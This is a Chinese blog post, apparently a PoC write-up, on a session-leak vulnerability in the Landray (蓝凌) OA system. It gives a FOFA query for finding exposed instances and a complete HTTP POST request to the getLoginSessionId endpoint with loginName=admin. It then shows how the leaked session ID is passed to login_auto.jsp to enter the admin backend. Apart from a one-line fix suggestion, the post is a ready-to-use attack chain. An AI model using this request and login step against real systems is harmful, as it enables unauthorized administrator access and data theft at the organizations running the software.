蓝凌OA getLoginSessionId.html 信息泄露漏洞

产品简介

蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展

漏洞概述

蓝凌OA getLoginSessionId接口泄露session信息,导致攻击者可利用此漏洞进入到管理后台。

指纹识别

fofa:

app="Landray-OA系统"

漏洞利用

poc:

POST /api/sys-authentication/loginService/getLoginSessionId.html HTTP/1.1
Host: you_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

loginName=admin

获取sessionId
在这里插入图片描述
利用泄露的session 使⽤sso登录到后台

http://you_ip/sys/authentication/sso/login_auto.jsp?sessionId=泄露的session

在这里插入图片描述

修复建议

对路径/api/sys-authentication/loginService/getLoginSessionId.html加入鉴权机制

【男女情爱,相互喜欢时,是圆圆镜,团团月。情伤过后,就是一锤碎出无数月,好像没那么喜欢了,但是记起更多。】

  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值